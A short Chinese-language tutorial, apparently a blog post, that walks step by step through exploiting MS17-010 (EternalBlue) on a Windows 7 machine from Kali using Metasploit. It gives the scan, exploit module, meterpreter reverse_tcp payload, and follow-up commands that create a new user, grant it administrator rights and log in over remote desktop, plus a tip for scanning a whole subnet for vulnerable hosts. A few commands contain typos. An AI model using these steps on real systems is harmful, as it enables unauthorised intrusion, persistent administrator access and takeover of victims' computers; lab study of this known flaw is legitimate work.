MS17-010漏洞利用工具系統入侵(實測)
一、打開kali和win7查看IP。(1) Windows7作為靶機
(2) Kali作為攻擊機(最新版kaili)
二、打開kali進入終端輸入nmap +IP查看靶機是否開啟445端口。
三、在kali中輸入
msfconsole
(等待一會可能會有點慢)
四、進入后輸人
search ms17-010
(就是之前的永恆之藍,也就是新聞上報道的比特幣勒索病毒)
五、找到
exploit windows/smb/ms17_010_eternalblue
運行
use exploitwindows/smb/ms17_010_eternalblue
六、輸入
show options
查看和配置RHOST(靶機)和LHOST(操作機)
由於我用的是虛擬電腦所以我環境已經配置好了。
如果你不知道那台電腦有漏洞你可以輸入
set LHOSTS 網關/24
如果是[+]前面是這樣說明有漏洞,然后再
set RHOST +IP
七、設置TCP連接 set payload windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
八、
run或exploit進行攻擊
九、可以創建用戶
net user xxxx 1234 /add
(xxxx用戶名 1234密碼)
十、
net localgroup administrators xxxx /add
(將用戶設置為管理員權限)
十一、重新打開一個終端
rdesktop+IP
這樣就進去了。